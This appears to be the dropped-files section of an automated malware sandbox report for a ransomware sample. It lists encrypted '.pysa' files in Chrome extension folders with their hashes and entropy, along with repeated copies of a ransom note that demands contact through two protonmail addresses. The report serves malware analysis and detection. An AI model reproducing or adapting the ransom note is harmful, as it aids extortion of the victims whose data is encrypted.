                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_background.js.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1026048
                  Entropy (8bit):7.999792538762337
                  Encrypted:true
                  SSDEEP:24576:p0md8Nq3RzoE2Cu5X9oOm1ymXjHLsro5MKoXGEThwLEZYuqT:jwCCeOlMjn7oX1hXZYnT
                  MD5:D1585A317F91FBF8A711B69EE1839095
                  SHA1:9B1037BB017463686BA8870D561299A29B9E9221
                  SHA-256:5516BF3BD69076348AE3D735A99D691F245F70F31AE124009720CBAA5D19BABD
                  SHA-512:AC05A8D88570A17021DB67AF2833DC369C62C929215EA9907547BD639B526D027B5E2C7E3DC080DF3B2766DCC9141567C548B36AD663F0F181A74FEDB07F8CFB
                  Malicious:true
                  Preview: ..M..n..?...M...d..h....SNJT....5...../.v.....;...$.w.=.l..@.re....Go#...-.8..IW.Nl....g.LI.[o.U|$.....r....ka....[.9..;.n.......gz.....3....b..Q].X.{{V....G..`.(....U.@......|...}.3Lx*..1.A.[..Y.".8...@....y.N....2.....{.....v.c..#.h..@....O.%G|......._...2$...(.Q.....m..8H..........@sd..6..&{.\L5.|..Z.............$.I.n..Q..O.......o..1^.......=...D.uc.z.)......:."..*?..K..^....(xO.,a....Nc..e&...eO.l..ri..3.1......&.@A..n..8.)..g.AQ...-..M.H.K......=...4.J...;cM.<...J.V.U..l.]*.j R~&...b{1...9...N=..x.N..r..s..;...%_.1........W..C.".PwWt..*..}b......[7......V1...B.QQ:../b.....[........<>u.;..T.H.P.....V/..y..z..*....d.w.8*.}.......P...m#.$:.P....&.....@b1...}..,.X..7). ....DYMp]G....M..H..).n.)!9S..4...,n..#...7j0.m..j..*E"..%.G.Zn.[&+... Q.P..F..*.b....l..=X.-.o....W~..]h^.V.67P..vr.......I...q..1F8.=.u....*...G....:..0o.L..B~\...8...A.O..E..i......Y.#.rp...$..p....a...`R)2....i...v..0I..%>~.}.i.m...b.B|..2].0.l.5Mi.X;.MQ.J7..e.e...nu
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_window.js.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998433956403327
                  Encrypted:true
                  SSDEEP:6144:s6huppe08G4JbABE9HmX6V9dW3k2BZnBNimXGc:1h2e08G4RMExw6E3z3Nixc
                  MD5:F6B81A2421CFC3DBA11164E18FD4AD6C
                  SHA1:F1FA6071FB0F3B6D9FFCC136502CEB8DD3FA19C2
                  SHA-256:D44E6CC2E5FADA451174E46ECB238B2AB06192F4685AE8083B8F5DB9893C1B45
                  SHA-512:9AA522D147AF0C4B2428E5B457C4DAE97A314E704574D376730C01E762773571573893DFFD7FB28D35CC778C6D1CE73A10378ED8481AF3C3BC51CE878BBF7E42
                  Malicious:true
                  Preview: ..Wbcx|.........L.X..}f .k.{5..QU...q..%.Z..o.l....Q.9..........B.m]#.(..'......%.w`.#.:]U....$..[.......h..Q....u....6i.&t-z..S .....G.!n.A..Z.1.6...@..TU..r....bzD.......Y..D.......m...ZF:...uU5g.......`.......y....,].D'<..~.*f.."x..G....4......F.q.S...\.7..h.I....^r..i(......2.u...$d.'..[-..v...a.hX...&m........f.C...%..}t{hH.^)...0.c"....l....*....:(0...08._|.ce[$?16m...^.c6(...J.#.9....s,..T .B......D.b....5.:....G.P...(8y.;(..tI..hc..;_U.. ......Aw..'....wmF..P../...^|.Cu..%ak..#.Vf.:...k_...D..b?.+.q.26b$\.O.F...q.c.D;!&"~.....Nob..u{>.........*&..mP..1.T. ...e..Fc.n........D..%-.2.AKhS..D..^].......I.)i.O.'..i.....nK..=0...R:p./.c...U..Cp.I._z.....D....ae.\.....R..-...+qtZs.(.`{.#tw_._.{.]b...+..O...._...5,...L.?...v-K.Va..P:5[.o={C..B....d...#.m...6.._.g..5..c.eV.r....};.`..p......^.xK[.R,.2p...O..Q...v.J..(.._.)....Cgk;..#.....`......&7&.J.\*....`....C~cf.T~..E....... .<...M.f.)...u.\.*.........../.;..h..9.i.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\craw_window.css.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.056953429529619
                  Encrypted:false
                  SSDEEP:48:OnRKvxK7g0pcTe3hE8vCT/r3t1bCaMMIq5zHKMAHLq7KPfJQnFb/qN4:nxKM798vCT/r3tcIsPrq7KXJQFjW4
                  MD5:8E3149E8DDAA6A57E70B154EA4E8F3FE
                  SHA1:BB6E32345CA287D07B4A17CE2874FE4D8C87C8E3
                  SHA-256:0FC27051B85BD7FF28B9328FE762C9E6C7BA845E7C447F863881AA1702732123
                  SHA-512:9952D4C5902368BFEDA321BEE26F7C51705FA6D949F00C355684A68E8B5DF2BC215E713F84A790C6CD36AED7CBCBDAA23DC8431ED58891E9B570764ABDCD99F3
                  Malicious:false
                  Preview: ....c3o*..........!1..`.......lHH...D..[}.:8.q9..ZO........!...{2S..,...:.....B^...z.e....-2....?...........B!.Wq.n.F..|."...i......#Hx.P.^...Y...i3f_...Cm.!...>]...)H......N.g...5......(.7...a..ji...1W{a..".0...2.......=+......uB..N.....K6AL5.&?P...........zcw.C.V..aX.tx..i.z..B......3.....mU.n..2......<..<..!.@...v..6..|s{l......O6)..^.eD.........=._A.>.N.t..6l?.A...8.B.m1..=.[.~.g.eu.:.U.S..p...`0...$..[.......-..x...|b.......=.1N.q.J...%........z.i$#.>(.`....*...?.E.i`.t....E.g..Q.)y.....K..I....mI..?.6..7.rG...C..jb..u7.l>..f..3m4XPN.J..y.?...K..@Z......}...l\...T6...,...}z..Z..rS^.J.(..5.v.....b.2....k2.Jm.OM}W..#...5b.gI.Z...!=...;..,.)..^..xm.y.CD[.....,|_....>4...p...| ......+:1..n.P]Q.[_...v.V`98l..(b..!........B.WNhz....X.o.}...$..Jb..m.Qr{..(.}=..J.B./.2...<zA'...h!c...}....N..H+......A...I.x.^..X.{ ..@/>...&..........7...q.........J.a...D...k....m.'q..F}...Y...."f..s...?..^.c.^....X.....^<i.kO......./k(......Y........!..$Y\.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):71680
                  Entropy (8bit):7.989597473670959
                  Encrypted:false
                  SSDEEP:1536:OaYLklPktIWovXO2fBT2rQ5hEOpKBTqZIgZg92rbW7fgwGs:OQKtIWo/O2cAhEkIN92rbW7fX
                  MD5:B2A3B824910A4373A4E05D4902AC0890
                  SHA1:8A5C11FF2952EBEDE67A70CC6B265175A696E2FF
                  SHA-256:993FCCD187BBB88AB38C1A3131565E431D0F7311A3EBB477912E6CAB283148D2
                  SHA-512:8E285D450AEA1CD9411A23E49858A4F3393A80D51C38AE6325E79C89FD93325AC968316297433EB58BB73633CA2C7BB6B45475E94A013F4063DC08EC8691C76D
                  Malicious:false
                  Preview: ....).k.f6.j|..e.....OHB.V.Fw.......R#..4..4.....7.H..q_.`..S...u.W.....;...oYC.J^.1..,......o.(X...../..:..:.T.2=.....v....o....CR.'v0...8. k8...v..@.L.....^@.......>...'.p.#..... .Fk(...$q.Q..../..'..N.B+.t......:.<k...K......*..8....^..T.......N.F.!........K..n..6o...A....}......Hx".*...U..r~..*.16n.:.zo....B~..{<....'...#.F!}...K.@...].KP @.a.....v..L26.#..........<....S....>.R......@.o...L....../g.c.+.L..^.P.rpK..).h.(j-Zw_....Lh%....}#JC...qi ..?S....\Y....4co..(....QRz......is.........5Q..u.HL...T+.t.X...m&....[....MN.-.p.....>..]u.......y..{.]...".....b..;..}.u.<.;U...c....5..5... o..o....LL.wf......I5T..f1.kzf../..b.p.D....8.C........w...'.....K..........r+8.?.......8..@.h.Q..%.s..T*..a....Y.............e......vd.....z.DA&.....?.....[...N.N.:%..}...S..J..h..RjD...I.*Nt......dt6aqJ5.0L..cV...A..%...z.cKW9c..\..?...\(...~...<.L..{........B..D.....5.5.l.z.l..LXcvp.....f.H;....gG.mq..P...@...*.?H.N.U....b..Cj....1......
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\icon_128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):7.360079901163943
                  Encrypted:false
                  SSDEEP:96:+3gGRtxdbJh1LYNKpzmuLeSUXLVO0mIXARBBwD2ODU9/TATUT8fOb14xQC+2mt8M:+Q4xdbJhpYN0zmuLeSULVOZI8BwKL/Tp
                  MD5:C9CDF97183716337E1C96D34F47C42FB
                  SHA1:5C9B96989FBA519FD8208251DFFADB32B7F00D74
                  SHA-256:31367A4105004EEAFD7EA6D3E0E129EB779148C6F8B719CE24D40F791F41D857
                  SHA-512:DB1323C9D9910D50606DD62AFFA4D74A5797B92F38B2A0CC49132C3D6537F1C8279C351010F749B7A558B9930D10426927B7EE1ED878845C07CC0920ED804254
                  Malicious:false
                  Preview: R....*A.&........`.a.........%..P...bY...\M...i.Y.?......U....X...%z".V.^-....V...B.L...>.dj+..q.,..O$&.8.1...i.....YR..V.....)&.....8..r..pD{f..07....e..,0.........J..[.2.m....y..+..9.....~..@.(..k5V........0..f3[.....'..@......._}./{.J.aYZ=....RV...#.a..sA.C"?kb......z..) a..k.}@2z.."GP..J...s.T.|\d.......^..<.......j...b..@.I.*..>.R.H.,].xJK.b...].*w....I...<..e....SC$..P.SMu.....b+u.>4.f...D......9...6D....y.$.....p...i.\].ZS.A..S...`)5..:..V>....,:...)....`%..T$../......O".......Ouh...S.L....3S.'.;.R....h....n...`y......O.`.3....aR.........{u.>.......}...{\R.N.!@.J.f..J.........1z=..1.X=&..Tn.)......]...j.....}.`...x..*.|=g_.\......kP/.......SZ...$.<.o..!!...)....w`^.a!.E....\.o.{P.!}.2cZ...w...Z/J..'.%.=...43..p...r.7...b..QJ`..X.eH`<8..2.-)Y.u.K..[U...#.X....%!#..5z..yX.B....F.A..H.E.z...D.I/.Hv:.3.E.'.....e..6....:.4..F...<...HM.)0.<?..gZ.x_......+....AKIc[.=.?r....1u.9..rN.%..o.^4.1....<xx.a......".$.R|h)...R.)O.:...M...%.QO.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\manifest.json.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.061388837168621
                  Encrypted:false
                  SSDEEP:48:MQE5Bn9l7TzxauC+LjFJf4Sv76SeNOHiSCgURoDRKN7oQQj1KVPFaWdxobNjwXg7:MQEbn9l7XxacfXQSOBRgUdN7oQqgQWd+
                  MD5:5F98F002E1AB5D911B8D365F2FA8C471
                  SHA1:64C86183D6CC13D3762A0F0D8378D6F0F97B67A9
                  SHA-256:C69BD65D0BDF06ACF8B9ECE166E210A468977FD4E10954E3F376F48A9263A358
                  SHA-512:35E8D679539ADB3C31ADAE5412156FC551CDB6C540B88F4898F5E8E92734FDF29060BF0C04DF6B142EB7FC2B336A5F1401D4ABF45F2353BA0D6A1DCFBD37423D
                  Malicious:false
                  Preview: yd....5...X&9.C4.<.,G...o.U...T!....T.3.U..#.9..,.b.c..A.!Z..Q.$.KL...z...... .....8O....k...e....g..:.....]..!...q.t..u^.....S...1..i.........;..b...g...K....x....@.\.@`..Q.#..[...A^.:.?.%..L......U.........H....M.(.E1o....).{.....*.: .3/.$.4...e..I...^...vc.g..J.....%..D.Z..9.v..z!<...{...).]...|........m.3-.C...C3..Dj....v."..fQ..d1...)....i..l.....'y...\r1.}.>..c.~..wZ1.7N.4r..&z..g].1..>.9._.p...K......t[ ..H3w..T$8......u...&.../...LT.....P........Z`.1@.-.LWk.S20T.!...dU..F..?..:.6N]...{D...u]....|7... Z...m..N3..6.v....p......R....*.gD..D.b.]S%.f<}.r..3..}..3..f/.f..h..^y.`...1^rQjm..j.]..*.....x.f.a....r.5.....:@vh.2....y.<.d8..<...^&A.[.V`...~I6$f f.<.z..Bh.......'.R.mOpb..i3..1.Z..........b..+O..!.z....V......g..W.y....;....~...&%#..t?K.~.W...O...,.z....p....a..i..K.M.V.q...}.....t..'....=".u.dtqP.'.H....).k..;.2..|+.n#.!.R...%....3i.2,...~N."...* |"=. c......s....gJ./..,k..>.~.M..&.e.!..L#.=.m`.....7..^.?....a[...C...K.D.@..(s&o...t5
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8192
                  Entropy (8bit):7.591320157280332
                  Encrypted:false
                  SSDEEP:192:mj7ldbVc3sGpaabiAaVdV1tRe7GhgdAptFA+uHgTwxxyG8:mvldbVc8GkaFaVdV/hgiG+UxxyH
                  MD5:DE9EB94FC07B3E73C359CD5B1F479719
                  SHA1:B22C0E4E4805B380BAD68049ED0AEE51102BB928
                  SHA-256:06A3685E2589E257A9644C223B0BBFA1208D2B2DF4B7370D23D97E8C6178B335
                  SHA-512:36222D88CA1908CA2205FC047E54CA8E6C86944198350F3F12A78D6253E312492CF4E34D6D98D001AED65941AED1F229E23C834D095CFA44350DFBF0BCCC7659
                  Malicious:false
                  Preview: ..a.$,......P.O...E.k....n....W.>i.SHY...2.....!.&..... ]..Y.j...w..+..=t...Q.t...@....U.U..r.\j../.6.\c.........X.......~.<..l!D.........`... ..u.N......F...n9...]......8.]G...Ca$[..v...<...`.ZM...4y..Q&>a.....S.=y...Eg"..D[...s.b.q2=...F0.K..h>.$g...21.............XWT...S;.Fi!v..a..J....QU#g.=......\r.j$u..1.g^lI.q..:Ko.1@..%h....dg.d@..t}r&.p..w.......F[H..@P...OQ..xBM&.).Lm.....$.,.....Q.P.Ca2u..}/....j...v.]>.t'..>......q.I...pr..MR.6.......6.#%.V ..7.......V@.....d..0`..Y.....].E\.T...].*=.^...t7|U..c8....0.8....h.8.....|.[...YnlD4...{T.........Z>@h.=z.w.jM....&."%_9.....D.......v>Xm.....,...v..u..r....\.{_o.'.|).x.Y...sN.}.........Y ......y&.A..>9...A..\j...Y.b..c....vr..(...>O..b8.!.g..p1...1.9...9.$......h...sE..r?...n_;^..pVvy../w...'.j&...6...u..w..M)g?...7..[./l.D..?.|9.,./......\|..M#....FM-.f..f....Pp.wG..+.SY^t.......cK..{......\"0...J.a..P.6..j.9......#CM...'6...t...&....Rp3.'......r..V0*...".&.....B.(&..)......
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\ar\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.921559538392843
                  Encrypted:false
                  SSDEEP:384:FSrpsTAgxtaW5fUWv/Op8IAy39rRbjo5xP4litqJ0VY5Wzdm4AcoWxGIXIrC6:Fr7tasfzXOp8TarRbj2Pff6WhvjoWx10
                  MD5:123395A06DE8EDD627F5487AC046AA5A
                  SHA1:3E7837F40DA254153B1B5E9B32CD09FBE1FB28B8
                  SHA-256:0AD4699DF1B9E93A2D51E20F5AB70204A7B2E6DC7ABCBA1C6179A01B89D1E0E3
                  SHA-512:EBED0EB33BA9EC95ED1F4C507AD624F2DFC2417689ECB24271B8BE1F56F4A7279C6FB25D55E8D2A2312D3BD548DF22CCF4B1DE1E3DAF496602134FF8E440A653
                  Malicious:false
